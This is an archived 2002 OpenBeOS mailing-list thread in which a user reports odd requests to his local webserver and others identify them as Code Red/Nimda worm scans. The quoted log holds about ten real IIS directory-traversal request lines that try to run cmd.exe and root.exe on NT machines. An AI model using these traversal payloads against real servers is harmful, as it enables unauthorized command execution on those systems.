[openbeos] Re: I think someone tried to hack into my machine

• From: Colin Rogers <crogers@xxxxxxxxxxxx>
• To: "'openbeos@xxxxxxxxxxxxx'" <openbeos@xxxxxxxxxxxxx>
• Date: Tue, 19 Mar 2002 11:39:07 -0000

"A BILL GATES DECIPLE"

Actually he is less likely to be a Bill Gates deciple, BECAUSE he is a
hacker. For all we know, he could be using BeOS as a platform to hack NT
boxes! =] 

Col.

-----Original Message-----
From: AlAbsi [mailto:alabsi@xxxxxxxxxxxxxxx]
Sent: 19 March 2002 11:17
To: openbeos@xxxxxxxxxxxxx
Subject: [openbeos] Re: I think someone tried to hack into my machine


Dear Friends,

You don't know me but I build so much hopes in BeOS but its gone, I
would like to salute you all for your enthusiasm and great work, but I
also would like you to remember the main reasons that made BeOS great
like taking advantage instantly of multi processor PC, and the more user
friendly it is the more success rate you'll achieve.

IF SOME ONE TRIED TO HACK YOU THAN IT'S A BILL GATES DECIPLE LOL BUT I
GUESS HIS END WILL BE ON THE HANDS OF GREAT PPL LIKE YOU...CHEERS FOR
READING THIS AND GOD BLESS.

ANGELUS


  

-----Original Message-----
From: openbeos-bounce@xxxxxxxxxxxxx
[mailto:openbeos-bounce@xxxxxxxxxxxxx] On Behalf Of François Revol
Sent: Tuesday, March 19, 2002 12:13 PM
To: openbeos@xxxxxxxxxxxxx
Subject: [openbeos] Re: I think someone tried to hack into my machine

Seems just another codered or nimda searching for an already infected
box
(on infection, it copies cmd.exe, the "shell" if it can be given that
name,
to root.exe somewhere)
Don't take care, all it can do is grow your logs (and suck up your BW
:-( )
It's solely NT related.

François.

En réponse à Daniel Reinhold <danielr@xxxxxxxxxxxxx>:

> Ok, this was rather interesting. It happened just about fifteen
minutes
> 
> ago (as I'm writing this).
> 
> I'm online (PPP dialup) and am also running a local webserver (i.e. 
> sending requests to loopback address 127.0.0.1). Yeah, that's asking 
> for trouble, at least theoretically. That is, someone on the internet,
> 
> if they happened to get a hold of my (temporary, dynamically assigned)
> 
> IP, could send requests for local files and have them sent back out 
> across the network. I've never had anything weird happen before, so 
> I've always been pretty blase about the security risk.
> 
> Anyway, I'm just testing some news items locally before copying them 
> over to the OpenBeOS website (which is my usual MO). Suddenly, I
notice
> 
> the Terminal window (largely covered by another window, but partially 
> showing) has a flurry of text flying by and the DUN replicant in the 
> Deskbar shows lots of bytes transmitting back and forth. Wtf? So I 
> uncover the Terminal window (which is running the webserver) and see 
> that a number of unusual requests have just been attended to. Here's 
> the first one:
> 
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
> 
> The remaining requests all look like that but with different URLs.
Here
> 
> are the other URLs that were requested:
> 
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0
> GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
> /winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 
> To me, that looks all the world like some hacker trying to grab files 
> from my local machine. Could there be another explanation?
> 
> Of course, I'm running BeOS (and don't have NT) so my local webserver 
> just returned a bunch of 404 (Not found) responses. Still, makes you 
> wonder.
> 
> Has anyone else on this list had any similar experiences? What do you 
> make of this?
> 
> 







This transmission is confidential and intended solely for the person or
organisation to whom it is addressed.  It may contain privileged and
confidential information.  If you are not the intended recipient, you should
not copy, distribute or take any action in reliance on it. If you have
received this transmission in error, please notify the sender immediately.
Any opinions or advice contained in this e-mail are those of the individual
sender except where they are stated to be the views of RDF Group or EMS plc.
All messages passing through this gateway are virus scanned.

Other related posts:

• » [openbeos] I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine

1. Home
2. haiku
3. Archive
4. 03-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---